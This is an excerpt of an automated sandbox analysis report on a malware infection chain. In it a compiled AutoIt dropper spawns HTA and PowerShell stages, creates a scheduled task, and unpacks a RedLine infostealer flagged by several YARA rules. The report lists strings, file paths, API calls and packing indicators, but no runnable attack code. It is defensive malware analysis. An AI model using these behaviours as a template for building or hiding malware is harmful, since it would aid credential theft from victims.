                            Source: 21.2.8c36d696e4.exe.b10000.0.unpack, type: UNPACKEDPEMatched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
                            Source: 21.2.8c36d696e4.exe.b10000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                            Source: 00000015.00000002.4319695523.0000000000B12000.00000040.00000001.01000000.00000012.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                            Source: 00000015.00000003.3956964167.0000000005050000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                            Source: Process Memory Space: 8c36d696e4.exe PID: 1216, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                            Binary is likely a compiled AutoIt script file
                            Source: random.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                            Source: random.exe, 00000000.00000000.2137152306.00000000003D2000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_151f4013-d
                            Source: random.exe, 00000000.00000000.2137152306.00000000003D2000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_4bcd1370-a
                            Source: 8c36d696e4.exe, 00000015.00000002.4326941105.0000000006813000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_0835f35e-d
                            Source: 8c36d696e4.exe, 00000015.00000002.4326941105.0000000006813000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_48ca97bd-c
                            Source: random.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_dfcc29b7-3
                            Source: random.exeString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_5c9f37e7-3
                            Source: tmp2E19.tmp.21.drString found in binary or memory: This is a third-party compiled AutoIt script.memstr_9c02145d-5
                            Source: tmp2E19.tmp.21.drString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_97027833-3
                            Creates HTA files
                            Source: C:\Users\user\Desktop\random.exeFile created: C:\Users\user\AppData\Local\Temp\huS4b5Vj8.htaJump to behavior
                            PE file contains section with special chars
                            Source: Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXE.6.drStatic PE information: section name:
                            Source: Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXE.6.drStatic PE information: section name: .idata
                            Source: skotes.exe.11.drStatic PE information: section name:
                            Source: skotes.exe.11.drStatic PE information: section name: .idata
                            Source: random[1].exe.18.drStatic PE information: section name:
                            Source: random[1].exe.18.drStatic PE information: section name: .idata
                            Source: random[1].exe.18.drStatic PE information: section name:
                            Source: 28f48f066a.exe.18.drStatic PE information: section name:
                            Source: 28f48f066a.exe.18.drStatic PE information: section name: .idata
                            Source: 28f48f066a.exe.18.drStatic PE information: section name:
                            Source: random[1].exe0.18.drStatic PE information: section name:
                            Source: random[1].exe0.18.drStatic PE information: section name: .idata
                            Source: random[1].exe0.18.drStatic PE information: section name:
                            Source: 0dd40f41c4.exe.18.drStatic PE information: section name:
                            Source: 0dd40f41c4.exe.18.drStatic PE information: section name: .idata
                            Source: 0dd40f41c4.exe.18.drStatic PE information: section name:
                            Source: random[1].exe1.18.drStatic PE information: section name:
                            Source: random[1].exe1.18.drStatic PE information: section name: .idata
                            Source: random[1].exe1.18.drStatic PE information: section name:
                            Source: 1e1a1f5243.exe.18.drStatic PE information: section name:
                            Source: 1e1a1f5243.exe.18.drStatic PE information: section name: .idata
                            Source: 1e1a1f5243.exe.18.drStatic PE information: section name:
                            Source: random[1].exe2.18.drStatic PE information: section name:
                            Source: random[1].exe2.18.drStatic PE information: section name: .idata
                            Source: random[1].exe2.18.drStatic PE information: section name:
                            Source: 8c36d696e4.exe.18.drStatic PE information: section name:
                            Source: 8c36d696e4.exe.18.drStatic PE information: section name: .idata
                            Source: 8c36d696e4.exe.18.drStatic PE information: section name:
                            Powershell drops PE file
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXEJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess Stats: CPU usage > 49%
                            Source: C:\Users\user\Desktop\random.exeCode function: 0_2_0037D5EB: CreateFileW,DeviceIoControl,CloseHandle,0_2_0037D5EB
                            Source: C:\Users\user\Desktop\random.exeCode function: 0_2_00371201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00371201
                            Source: C:\Users\user\Desktop\random.exeCode function: 0_2_0037E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_0037E8F6
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXEFile created: C:\Windows\Tasks\skotes.jobJump to behavior
                            Source: C:\Users\user\Desktop\random.exeCode function: 0_2_003180600_2_00318060
                            Source: C:\Users\user\Desktop\random.exeCode function: 0_2_003820460_2_00382046
                            Source: C:\Users\user\Desktop\random.exeCode function: 0_2_003782980_2_00378298
                            Source: C:\Users\user\Desktop\random.exeCode function: 0_2_0034E4FF0_2_0034E4FF
                            Source: C:\Users\user\Desktop\random.exeCode function: 0_2_0034676B0_2_0034676B
                            Source: C:\Users\user\Desktop\random.exeCode function: 0_2_0035E7810_2_0035E781
                            Source: C:\Users\user\Desktop\random.exeCode function: 0_2_003A48730_2_003A4873
                            Source: C:\Users\user\Desktop\random.exeCode function: 0_2_0033CAA00_2_0033CAA0
                            Source: C:\Users\user\Desktop\random.exeCode function: 0_2_0031CAF00_2_0031CAF0
                            Source: C:\Users\user\Desktop\random.exeCode function: 0_2_0032CC390_2_0032CC39
                            Source: C:\Users\user\Desktop\random.exeCode function: 0_2_00346DD90_2_00346DD9
                            Source: C:\Users\user\Desktop\random.exeCode function: 0_2_0032B1190_2_0032B119
                            Source: C:\Users\user\Desktop\random.exeCode function: 0_2_003191C00_2_003191C0
                            Source: C:\Users\user\Desktop\random.exeCode function: 0_2_003313940_2_00331394
                            Source: C:\Users\user\Desktop\random.exeCode function: 0_2_0033781B0_2_0033781B
                            Source: C:\Users\user\Desktop\random.exeCode function: 0_2_003179200_2_00317920
                            Source: C:\Users\user\Desktop\random.exeCode function: 0_2_0032997D0_2_0032997D
                            Source: C:\Users\user\Desktop\random.exeCode function: 0_2_00337A4A0_2_00337A4A
                            Source: C:\Users\user\Desktop\random.exeCode function: 0_2_00337CA70_2_00337CA7
                            Source: C:\Users\user\Desktop\random.exeCode function: 0_2_0039BE440_2_0039BE44
                            Source: C:\Users\user\Desktop\random.exeCode function: 0_2_00349EEE0_2_00349EEE
                            Source: C:\Users\user\Desktop\random.exeCode function: 0_2_0031BF400_2_0031BF40
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FFD34345B819_2_00007FFD34345B81
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FFD343438289_2_00007FFD34343828
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FFD343454099_2_00007FFD34345409
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FFD344108BD9_2_00007FFD344108BD
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXECode function: 11_2_00BC78BB11_2_00BC78BB
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXECode function: 11_2_00BC886011_2_00BC8860
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXECode function: 11_2_00BC704911_2_00BC7049
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXECode function: 11_2_00BC31A811_2_00BC31A8
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXECode function: 11_2_00B84B3011_2_00B84B30
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXECode function: 11_2_00B84DE011_2_00B84DE0
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXECode function: 11_2_00BC2D1011_2_00BC2D10
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXECode function: 11_2_00BC779B11_2_00BC779B
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXECode function: 11_2_00BB7F3611_2_00BB7F36
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXECode function: 12_2_00BC78BB12_2_00BC78BB
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXECode function: 12_2_00BC886012_2_00BC8860
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXECode function: 12_2_00BC704912_2_00BC7049
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXECode function: 12_2_00BC31A812_2_00BC31A8
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXECode function: 12_2_00B84B3012_2_00B84B30
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXECode function: 12_2_00B84DE012_2_00B84DE0
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXECode function: 12_2_00BC2D1012_2_00BC2D10
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXECode function: 12_2_00BC779B12_2_00BC779B
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXECode function: 12_2_00BB7F3612_2_00BB7F36
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 13_2_0034886013_2_00348860
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 13_2_0034704913_2_00347049
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 13_2_003478BB13_2_003478BB
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 13_2_003431A813_2_003431A8
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 13_2_00304B3013_2_00304B30
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 13_2_00342D1013_2_00342D10
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 13_2_00304DE013_2_00304DE0
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 13_2_00337F3613_2_00337F36
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 13_2_0034779B13_2_0034779B
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 14_2_0034886014_2_00348860
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 14_2_0034704914_2_00347049
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 14_2_003478BB14_2_003478BB
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 14_2_003431A814_2_003431A8
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 14_2_00304B3014_2_00304B30
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 14_2_00342D1014_2_00342D10
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 14_2_00304DE014_2_00304DE0
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 14_2_00337F3614_2_00337F36
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 14_2_0034779B14_2_0034779B
                            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe 427B9E9508B94A3D1C459EB6E72B84CE445B2EDEB42D6D60F8953DBF11EE9E6A
                            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\random[1].exe 1E9FF1FC659F304A408CFF60895EF815D0A9D669A3D462E0046F55C8C6FEAFC2
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXECode function: String function: 00B980C0 appears 260 times
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXECode function: String function: 00B9DF80 appears 35 times
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 003180C0 appears 260 times
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 0031DF80 appears 36 times
                            Source: C:\Users\user\Desktop\random.exeCode function: String function: 00319CB3 appears 31 times
                            Source: C:\Users\user\Desktop\random.exeCode function: String function: 0032F9F2 appears 40 times
                            Source: C:\Users\user\Desktop\random.exeCode function: String function: 00330A30 appears 46 times
                            Source: random[1].exe1.18.drStatic PE information: Data appended to the last section found
                            Source: 1e1a1f5243.exe.18.drStatic PE information: Data appended to the last section found
                            Source: random.exe, 00000000.00000003.2139190094.0000000000F0D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename2w5 vs random.exe
                            Source: random.exe, 00000000.00000003.2139190094.0000000000F0D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FV_ORIGINALFILENAMEGw vs random.exe
                            Source: random.exe, 00000000.00000003.2140552071.0000000000DC3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FV_ORIGINALFILENAME vs random.exe
                            Source: random.exe, 00000000.00000003.2142740213.0000000000DD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FV_ORIGINALFILENAME vs random.exe
                            Source: random.exe, 00000000.00000002.2143706773.0000000000DD7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FV_ORIGINALFILENAME vs random.exe
                            Source: random.exe, 00000000.00000003.2139108039.0000000000F00000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename2w5 vs random.exe
                            Source: random.exe, 00000000.00000003.2139108039.0000000000F00000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FV_ORIGINALFILENAMEGw vs random.exe
                            Source: random.exe, 00000000.00000003.2140757980.0000000000DD2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FV_ORIGINALFILENAME vs random.exe
                            Source: random.exe, 00000000.00000003.2140873286.0000000000F14000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename2w5 vs random.exe
                            Source: random.exe, 00000000.00000003.2140873286.0000000000F14000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FV_ORIGINALFILENAMEGw vs random.exe
                            Source: random.exe, 00000000.00000003.2139128918.0000000000F07000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename2w5 vs random.exe
                            Source: random.exe, 00000000.00000003.2139128918.0000000000F07000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FV_ORIGINALFILENAMEGw vs random.exe
                            Source: random.exe, 00000000.00000003.2140634998.0000000000DD0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FV_ORIGINALFILENAME vs random.exe
                            Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
                            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
                            Source: random.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                            Source: 21.2.8c36d696e4.exe.b10000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                            Source: 21.2.8c36d696e4.exe.b10000.0.unpack, type: UNPACKEDPEMatched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
                            Source: 21.2.8c36d696e4.exe.b10000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                            Source: 00000015.00000002.4319695523.0000000000B12000.00000040.00000001.01000000.00000012.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                            Source: 00000015.00000003.3956964167.0000000005050000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                            Source: Process Memory Space: 8c36d696e4.exe PID: 1216, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                            Source: Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXE.6.drStatic PE information: Section: ZLIB complexity 0.9983023245912807
                            Source: skotes.exe.11.drStatic PE information: Section: ZLIB complexity 0.9983023245912807
                            Source: random[1].exe.18.drStatic PE information: Section: ZLIB complexity 0.9986363852896342
                            Source: random[1].exe.18.drStatic PE information: Section: ywmyudtw ZLIB complexity 0.9942215588817794
                            Source: 28f48f066a.exe.18.drStatic PE information: Section: ZLIB complexity 0.9986363852896342
                            Source: 28f48f066a.exe.18.drStatic PE information: Section: ywmyudtw ZLIB complexity 0.9942215588817794
                            Source: random[1].exe0.18.drStatic PE information: Section: ZLIB complexity 0.9984254807692308
                            Source: random[1].exe0.18.drStatic PE information: Section: hyfxsejb ZLIB complexity 0.9945094758985684
                            Source: 0dd40f41c4.exe.18.drStatic PE information: Section: ZLIB complexity 0.9984254807692308
                            Source: 0dd40f41c4.exe.18.drStatic PE information: Section: hyfxsejb ZLIB complexity 0.9945094758985684
                            Source: random[1].exe1.18.drStatic PE information: Section: crzarjak ZLIB complexity 0.9951457571476063
                            Source: 1e1a1f5243.exe.18.drStatic PE information: Section: crzarjak ZLIB complexity 0.9951457571476063
                            Source: random[1].exe2.18.drStatic PE information: Section: ZLIB complexity 0.9962366615853658
                            Source: random[1].exe2.18.drStatic PE information: Section: efrqcofg ZLIB complexity 0.9946268992219612
                            Source: 8c36d696e4.exe.18.drStatic PE information: Section: ZLIB complexity 0.9962366615853658
                            Source: 8c36d696e4.exe.18.drStatic PE information: Section: efrqcofg ZLIB complexity 0.9946268992219612
                            Source: 8c36d696e4.exe.18.drStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
